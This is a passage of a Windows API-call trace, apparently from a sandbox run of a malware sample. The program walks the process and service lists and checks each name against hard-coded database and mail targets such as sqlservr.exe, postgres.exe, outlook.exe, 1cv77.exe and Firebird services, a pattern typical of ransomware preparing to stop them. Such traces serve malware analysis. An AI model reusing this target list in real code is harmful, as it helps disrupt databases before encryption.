pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.466] lstrlenW (lpString="svchost.exe") returned 11 [0269.466] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.466] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.467] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.467] lstrlenW (lpString="svchost.exe") returned 11 [0269.467] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.467] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.467] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.467] lstrlenW (lpString="svchost.exe") returned 11 [0269.467] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0269.468] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0269.468] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0269.468] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0269.468] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0269.468] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0269.468] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0269.468] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0269.468] lstrlenW (lpString="audiodg.exe") returned 11 [0269.468] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0269.468] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0269.468] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0269.468] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0269.468] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0269.468] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0269.468] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.469] lstrlenW (lpString="svchost.exe") returned 11 [0269.469] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0269.469] lstrlenW (lpString="userinit.exe") returned 12 [0269.469] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0269.469] lstrlenW (lpString="explorer.exe") returned 12 [0269.469] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0269.470] lstrlenW (lpString="dwm.exe") returned 7 [0269.470] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.470] lstrlenW (lpString="svchost.exe") returned 11 [0269.470] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0269.470] lstrlenW (lpString="agent1c.exe") returned 11 [0269.470] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0269.471] lstrlenW (lpString="spoolsv.exe") returned 11 [0269.471] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0269.471] lstrlenW (lpString="reader_sl.exe") returned 13 [0269.471] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0269.471] lstrlenW (lpString="dllhost.exe") returned 11 [0269.472] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0269.472] lstrlenW (lpString="taskhost.exe") returned 12 [0269.472] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.472] lstrlenW (lpString="svchost.exe") returned 11 [0269.472] Process32NextW (in: hSnapshot=0x380, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0269.473] CloseHandle (hObject=0x380) returned 1 [0269.473] Sleep (dwMilliseconds=0x1f4) [0270.042] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc470 [0270.177] EnumServicesStatusExW (in: hSCManager=0x42dc470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0270.193] GetLastError () returned 0xea [0270.193] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc9a) returned 0x4262fb8 [0270.193] EnumServicesStatusExW (in: hSCManager=0x42dc470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xc9a, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0270.194] CloseServiceHandle (hSCObject=0x42dc470) returned 1 [0270.195] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0270.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0270.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0270.195] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0270.195] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0270.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0270.195] lstrlenW (lpString="AudioSrv") returned 8 [0270.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0270.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0270.195] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0270.195] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0270.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0270.195] lstrlenW (lpString="BFE") returned 3 [0270.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0270.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0270.195] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0270.195] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0270.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0270.195] lstrlenW (lpString="CryptSvc") returned 8 [0270.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0270.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0270.195] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0270.195] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0270.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0270.195] lstrlenW (lpString="CscService") returned 10 [0270.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0270.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0270.196] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0270.196] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0270.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0270.196] lstrlenW (lpString="DcomLaunch") returned 10 [0270.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0270.196] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0270.196] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0270.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0270.196] lstrlenW (lpString="Dhcp") returned 4 [0270.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0270.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0270.196] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0270.196] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0270.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0270.196] lstrlenW (lpString="Dnscache") returned 8 [0270.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0270.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0270.196] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0270.196] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0270.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0270.196] lstrlenW (lpString="DPS") returned 3 [0270.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0270.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0270.196] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0270.196] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0270.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0270.196] lstrlenW (lpString="eventlog") returned 8 [0270.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0270.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0270.196] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0270.196] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0270.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0270.197] lstrlenW (lpString="EventSystem") returned 11 [0270.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0270.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0270.197] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0270.197] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0270.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0270.197] lstrlenW (lpString="gpsvc") returned 5 [0270.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0270.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0270.197] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0270.197] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0270.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0270.197] lstrlenW (lpString="LanmanWorkstation") returned 17 [0270.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0270.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0270.197] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0270.197] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0270.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0270.197] lstrlenW (lpString="lmhosts") returned 7 [0270.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0270.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0270.197] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0270.197] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0270.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0270.197] lstrlenW (lpString="MMCSS") returned 5 [0270.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0270.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0270.197] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0270.197] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0270.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0270.197] lstrlenW (lpString="MpsSvc") returned 6 [0270.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0270.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0270.197] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0270.198] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0270.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0270.198] lstrlenW (lpString="NlaSvc") returned 6 [0270.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0270.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0270.198] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0270.198] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0270.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0270.198] lstrlenW (lpString="nsi") returned 3 [0270.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0270.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0270.198] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0270.198] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0270.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0270.198] lstrlenW (lpString="PcaSvc") returned 6 [0270.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0270.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0270.198] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0270.198] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0270.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0270.198] lstrlenW (lpString="PlugPlay") returned 8 [0270.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0270.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0270.198] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0270.198] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0270.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0270.198] lstrlenW (lpString="Power") returned 5 [0270.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0270.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0270.199] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0270.199] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0270.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0270.199] lstrlenW (lpString="ProfSvc") returned 7 [0270.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0270.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0270.199] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0270.199] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0270.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0270.199] lstrlenW (lpString="RpcEptMapper") returned 12 [0270.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0270.199] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0270.199] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0270.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0270.199] lstrlenW (lpString="RpcSs") returned 5 [0270.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0270.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0270.199] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0270.199] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0270.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0270.199] lstrlenW (lpString="SamSs") returned 5 [0270.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0270.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0270.199] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0270.199] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0270.199] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0270.199] lstrlenW (lpString="Schedule") returned 8 [0270.199] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0270.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0270.200] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0270.200] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0270.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0270.200] lstrlenW (lpString="SENS") returned 4 [0270.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0270.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0270.200] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0270.200] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0270.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0270.200] lstrlenW (lpString="ShellHWDetection") returned 16 [0270.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0270.200] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0270.200] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0270.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0270.200] lstrlenW (lpString="Spooler") returned 7 [0270.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0270.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0270.200] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0270.200] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0270.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0270.200] lstrlenW (lpString="Themes") returned 6 [0270.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0270.200] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0270.200] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0270.200] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0270.200] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0270.200] lstrlenW (lpString="UxSms") returned 5 [0270.200] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0270.201] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0270.201] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0270.201] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0270.201] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0270.201] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0270.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x398 [0270.203] Process32FirstW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.203] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0270.204] lstrlenW (lpString="System") returned 6 [0270.204] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0270.204] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0270.204] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0270.204] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0270.204] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0270.204] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0270.204] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0270.204] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0270.204] lstrlenW (lpString="smss.exe") returned 8 [0270.204] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0270.204] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0270.205] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0270.205] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0270.205] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0270.205] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0270.205] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0270.205] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.205] lstrlenW (lpString="csrss.exe") returned 9 [0270.205] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.205] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.205] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.205] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.205] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.205] lstrcmpiW (lpString1="mysqld.exe", 